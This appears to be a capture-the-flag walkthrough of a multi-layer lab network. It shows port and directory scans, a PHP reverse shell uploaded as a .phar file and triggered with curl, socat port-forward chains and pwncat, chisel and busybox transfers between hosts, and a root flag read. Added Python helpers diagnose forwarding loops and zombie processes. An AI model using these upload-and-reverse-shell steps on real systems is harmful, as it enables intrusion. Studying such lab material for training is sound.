| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 40.40.40.3:80

Scan for directories; found an upload

❯ gobuster dir -u http://40.40.40.3 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt -b 403,404 --proxy socks5://127.0.0.1:1234
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://40.40.40.3
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 403,404
[+] Proxy: socks5://127.0.0.1:1234
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 1361]
/index.html (Status: 200) [Size: 1361]
/upload.php (Status: 200) [Size: 1357]
/uploads (Status: 301) [Size: 310] [--> http://40.40.40.3/uploads/]
Progress: 23670 / 23675 (99.98%)
===============================================================
Finished
===============================================================

Open it in Firefox

File upload vulnerability

I suspect there's a file upload vulnerability

I tried uploading a reverse shell; .phar files get parsed

Online - Reverse Shell Generator

Copy or download and save the payload

But the problem is the shell doesn't come back, so forward the port with socat

First transfer socat to the host on the 30 subnet

❯ proxychains scp /var/www/html/socat [email protected]:/tmp
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 30.30.30.3:22 ... OK
[email protected]'s password:
socat 100% 366KB 3.0MB/s 00:00

Forward the port on each host, hop by hop, until it finally reaches Kali

## Run on the layer-2 seller host
root@851709aee958:/tmp# hostname -I
10.10.10.2 20.20.20.2
root@851709aee958:/tmp# ./socat TCP4-LISTEN:4444,fork,reuseaddr TCP4:192.168.60.100:3333,reuseaddr&
[4] 13833
## Run on the layer-3 freddy host
┌──(root㉿e1a741f99a71)-[/tmp]
└─# hostname -I
20.20.20.3 30.30.30.2
┌──(root㉿e1a741f99a71)-[/tmp]
└─# ./socat TCP4-LISTEN:4444,fork,reuseaddr TCP4:20.20.20.3:4444,reuseaddr&
[2] 1862
## Run on the layer-4 mario host
mario@c5f63887b9e9:/tmp$ hostname -i
30.30.30.3 40.40.40.2
mario@c5f63887b9e9:/tmp$ ./socat TCP4-LISTEN:1234,fork,reuseaddr TCP4:30.30.30.2:4444,reuseaddr&
[1] 1151

Visit /uploads/php-reverse-shell.phar in the browser

But it errors out: the layer-4 host does get the shell, but it breaks at layer 3

┌──(root㉿e1a741f99a71)-[/tmp]
└─# ./socat TCP4-LISTEN:4444,fork,reuseaddr TCP4:20.20.20.2:4444
2025/02/19 09:24:21 socat[3585] E fork(): Resource temporarily unavailable

Not enough system resources⁉️

System resources are probably exhausted

Checked jobs and had no choice but to close the connections set up earlier first

┌──(root㉿e1a741f99a71)-[/tmp]
└─# jobs
[1]+ Running ./socat TCP4-LISTEN:3333,fork,reuseaddr TCP4:20.20.20.2:3333 &

┌──(root㉿e1a741f99a71)-[/tmp]
└─# fg
./socat TCP4-LISTEN:3333,fork,reuseaddr TCP4:20.20.20.2:3333
^C
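
Added example, not code from the original post: a small Python checker for a hop-by-hop forward chain like the one above. Each hop is described by the addresses its host reports in hostname -I, the port its forwarder listens on, and where it forwards to. The check flags a forward whose target is one of the forwarding host's own addresses, which a listener started with socat's fork option would keep looping back into itself, spawning a child per round trip until fork() fails, and a forward whose target port does not match the next hop's listener. The sample chains are constructed from the addresses and ports printed in the layer-2, layer-3 and layer-4 commands above; the hop names are labels added here. Note that the layer-3 command as typed forwards to 20.20.20.3:4444, and the hostname -I output on that host lists 20.20.20.3 among its own addresses.

```python
"""Sanity-check a chain of socat-style TCP forwards before starting it.

Added example (not from the original post). A hop is the set of addresses
its host owns, the port its forwarder listens on, and the (ip, port) it
forwards to. The checker reports self-forwarding loops and port mismatches.
"""
from dataclasses import dataclass
from typing import FrozenSet, List, Optional, Tuple


@dataclass(frozen=True)
class Hop:
    name: str
    addrs: FrozenSet[str]               # addresses the host owns (hostname -I)
    listen_port: int                    # port the forwarder listens on
    target: Optional[Tuple[str, int]]   # where it forwards to; None = final endpoint


def check_chain(hops: List[Hop]) -> List[str]:
    """Return a list of problems; an empty list means the chain is consistent."""
    problems: List[str] = []
    owner = {addr: hop for hop in hops for addr in hop.addrs}
    for hop in hops:
        if hop.target is None:
            continue
        ip, port = hop.target
        if ip in hop.addrs:
            # Forwarding to itself: each accepted connection is forwarded back into
            # the same listener, so a `fork` listener spawns children until fork() fails.
            problems.append(
                f"{hop.name}: forwards to {ip}:{port}, one of its own addresses (loop)"
            )
            continue
        nxt = owner.get(ip)
        if nxt is None:
            problems.append(f"{hop.name}: target {ip} is not owned by any hop in the chain")
        elif nxt.listen_port != port:
            problems.append(
                f"{hop.name}: forwards to {ip}:{port} but {nxt.name} listens on {nxt.listen_port}"
            )
    return problems


# Constructed from the addresses and ports shown in the walkthrough's
# layer-2/3/4 commands; the hop names are labels added for this example.
KALI = Hop("kali", frozenset({"192.168.60.100"}), 3333, None)
SELLER = Hop("seller(L2)", frozenset({"10.10.10.2", "20.20.20.2"}), 4444, ("192.168.60.100", 3333))
FREDDY_LOOP = Hop("freddy(L3)", frozenset({"20.20.20.3", "30.30.30.2"}), 4444, ("20.20.20.3", 4444))
FREDDY_OK = Hop("freddy(L3)", frozenset({"20.20.20.3", "30.30.30.2"}), 4444, ("20.20.20.2", 4444))
MARIO = Hop("mario(L4)", frozenset({"30.30.30.3", "40.40.40.2"}), 1234, ("30.30.30.2", 4444))

AS_TYPED = [MARIO, FREDDY_LOOP, SELLER, KALI]   # layer-3 forward targets its own address
CORRECTED = [MARIO, FREDDY_OK, SELLER, KALI]    # layer-3 forward targets the layer-2 host

if __name__ == "__main__":
    for label, chain in (("as typed", AS_TYPED), ("corrected", CORRECTED)):
        print(label, check_chain(chain) or "ok")
```

Running the checker over the chain as typed reports the layer-3 self-forward; the corrected chain passes. A forwarder stuck in such a loop consumes a process and two sockets per iteration, so the host hits its process limit long before any real traffic arrives.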

Chisel: layer five

I checked, and luckily the layer-4 mario host has curl, so I can curl the reverse webshell directly

Listen on port 3333 on Kali

The www-data user has sudo permissions

# Run on the target
mario@c5f63887b9e9:/tmp$ which curl
/usr/bin/curl
mario@c5f63887b9e9:/tmp$ curl http://40.40.40.3/uploads/php-reverse-shell.phar
------------------------
# Listen on the port on Kali
❯ pwncat-cs -lp 3333
[17:24:59] Welcome to pwncat 🐈! __main__.py:164
[17:37:31] received connection from 192.168.60.191:47960 bind.py:84
[17:37:31] 0.0.0.0:3333: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957
[17:37:32] 192.168.60.191:47960: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@ca5d6daff89a:/opt$ sudo -l
Matching Defaults entries for www-data on ca5d6daff89a:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User www-data may run the following commands on ca5d6daff89a:
(root) NOPASSWD: /usr/bin/env

I escalated to root anyway, though it's useless here

Check the IP, port-forward again, and upload socat and chisel

(remote) www-data@ca5d6daff89a:/$ cd /tmp/
(remote) www-data@ca5d6daff89a:/tmp$
(local) pwncat$ upload chisel
draining buffers... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 9.4/9.4 MB • 3.7 MB/s • 0:00:00
(remote) www-data@ca5d6daff89a:/tmp$ chmod +x chisel
(remote) www-data@ca5d6daff89a:/tmp$
(local) pwncat$ upload /var/www/html/socat
./socat ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 375.2/375.2 KB • ? • 0:00:00
[17:43:57] uploaded 375.18KiB in 0.42 seconds upload.py:76
(local) pwncat$
(remote) www-data@ca5d6daff89a:/tmp$ chmod +x socat
(remote) www-data@ca5d6daff89a:/tmp$ hostname -I
40.40.40.3 50.50.50.2

Damn 🌿, chisel got corrupted; upload a busybox to the mario host and start an httpd

wget it from the layer-5 host

## Run on the layer-4 mario host
❯ proxychains scp /var/www/html/busybox [email protected]:/tmp
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 30.30.30.3:22 ... OK
[email protected]'s password:
busybox
❯ proxychains ssh [email protected]
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
[proxychains] Strict chain ... 127.0.0.1:1080 ... 30.30.30.3:22 ... OK
[email protected]'s password:
Linux c5f63887b9e9 6.1.0-21-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.90-1 (2024-05-03) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Feb 19 07:39:44 2025 from 30.30.30.2
mario@c5f63887b9e9:~$ cd /tmp/
mario@c5f63887b9e9:/tmp$ ls -al
total 10640
drwxrwxrwt 1 root root 4096 Feb 19 10:05 .
drwxr-xr-x 1 root root 4096 Feb 18 11:35 ..
-rw-r--r-- 1 mario mario 1131168 Feb 19 10:05 busybox
-rwxr-xr-x 1 mario mario 9371800 Feb 19 05:41 chisel
-rwxr-xr-x 1 mario mario 375176 Feb 19 07:38 socat
mario@c5f63887b9e9:/tmp$ chmod +x busybox
mario@c5f63887b9e9:/tmp$ ./busybox httpd -f -p 8080
------------------------
## Layer-5 host
(remote) root@ca5d6daff89a:/tmp# wget 40.40.40.2:8080/chisel
--2025-02-19 11:07:51-- http://40.40.40.2:8080/chisel
Connecting to 40.40.40.2:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9371800 (8.9M)
Saving to: 'chisel'

chisel 100%[===============================>] 8.94M --.-KB/s in 0.1s

2025-02-19 11:07:51 (92.1 MB/s) - 'chisel' saved [9371800/9371800]

(remote) root@ca5d6daff89a:/tmp# chmod +x chisel

Everything is ready

And then the layer-3 host crashed

Insufficient system resources

-bash: fork: retry: Resource temporarily unavailable
-bash: fork: retry: Resource temporarily unavailable
-bash-5.2$ Read from remote host 20.20.20.3: Connection reset by peer
Connection to 20.20.20.3 closed.
client_loop: send disconnect: Broken pipe

I was pretty frustrated and had no choice but to reboot the target once

Redo everything from earlier

Found that the socat processes had finished (terminated), but their parent hadn't properly reaped their exit status

So although the processes had terminated, they still occupied PIDs

Zombie processes appeared; cause unknown, the only option was to reboot 🌿

At this point I'd tried many times
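
Added example, not part of the original post, to go with the zombie-process explanation above: a Python diagnostic that reads /proc/<pid>/stat records, counts children in state Z per parent, and compares the process count against the limits that make fork() fail with "Resource temporarily unavailable": RLIMIT_NPROC and, inside a container, the pids cgroup's pids.max. The SAMPLE records are constructed to look like a forwarder whose finished children were never reaped; run as a script it inspects the live /proc instead.

```python
"""Check whether 'fork: Resource temporarily unavailable' is explained by
zombie children holding PIDs.

Added example (not from the original post). /proc/<pid>/stat begins with
"pid (comm) state ppid ..."; comm may itself contain spaces and parentheses,
so the parser anchors on the last ") " before the one-letter state field.
"""
import os
import re
import resource
from collections import Counter
from typing import Dict, List, Tuple

STAT_RE = re.compile(r"^(\d+) \((.*)\) (\S) (\d+)")


def parse_stat(record: str) -> Dict[str, object]:
    """Extract pid, comm, state and ppid from one /proc/<pid>/stat record."""
    m = STAT_RE.match(record)
    if not m:
        raise ValueError(f"not a /proc/<pid>/stat record: {record!r}")
    pid, comm, state, ppid = m.groups()
    return {"pid": int(pid), "comm": comm, "state": state, "ppid": int(ppid)}


def zombies_by_parent(records: List[str]) -> Dict[int, Tuple[str, int]]:
    """Map parent pid -> (parent comm, number of zombie children it has not reaped)."""
    procs = [parse_stat(r) for r in records]
    comm = {p["pid"]: p["comm"] for p in procs}
    counts = Counter(p["ppid"] for p in procs if p["state"] == "Z")
    return {ppid: (comm.get(ppid, "?"), n) for ppid, n in counts.items()}


def pressure(records: List[str], pid_limit: int) -> Dict[str, object]:
    """Summarise how close the process table is to the limit and how much of it is zombies."""
    procs = [parse_stat(r) for r in records]
    zombies = sum(1 for p in procs if p["state"] == "Z")
    return {
        "total": len(procs),
        "zombies": zombies,
        "limit": pid_limit,
        "headroom": pid_limit - len(procs),
        "zombie_share": zombies / len(procs) if procs else 0.0,
    }


def live_records() -> List[str]:
    """Read every /proc/<pid>/stat that still exists while we iterate."""
    out = []
    for entry in os.listdir("/proc"):
        if entry.isdigit():
            try:
                with open(f"/proc/{entry}/stat") as fh:
                    out.append(fh.read().strip())
            except OSError:  # process exited between listdir() and open()
                pass
    return out


def live_pid_limit() -> int:
    """Smaller of RLIMIT_NPROC and the cgroup pids.max (v2 and v1 paths), where set."""
    limit, _hard = resource.getrlimit(resource.RLIMIT_NPROC)
    if limit == resource.RLIM_INFINITY:
        limit = 2**31
    for path in ("/sys/fs/cgroup/pids.max", "/sys/fs/cgroup/pids/pids.max"):
        try:
            with open(path) as fh:
                value = fh.read().strip()
        except OSError:
            continue
        if value != "max":
            limit = min(limit, int(value))
    return limit


# Constructed records shaped like /proc/<pid>/stat (first fields only):
# a forwarder (pid 1862) whose finished children were never reaped.
SAMPLE = [
    "1 (bash) S 0 1 1 0",
    "1862 (socat) S 1 1862 1 0",
    "3585 (socat) Z 1862 1862 1 0",
    "3586 (socat) Z 1862 1862 1 0",
    "3587 (socat) Z 1862 1862 1 0",
    "3590 (sh) S 1 3590 1 0",
]

if __name__ == "__main__":
    recs = live_records()
    print(pressure(recs, live_pid_limit()))
    for ppid, (name, n) in zombies_by_parent(recs).items():
        print(f"pid {ppid} ({name}) has {n} unreaped children")
```

Running this on the affected host before killing anything tells you whether the process table is full of zombies, which only their parent can reap (or which disappear when the parent is killed and init adopts them), or of live forwarder children, which points to a forwarding loop rather than a reaping problem.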


Follow-up

I looked at the rest of the flow; it's basically not hard, all standard routine

So I just took the password from a writeup and read root directly

(remote) peter@HappyJump:/home/peter$ su root
Contraseña:
root@HappyJump:/home/peter# cat /root/root.txt
3ac6640322d7d06957d3773fab3b27b7 -

In short, the box isn't difficult; don't waste time when the tools get stuck. Not recommended.
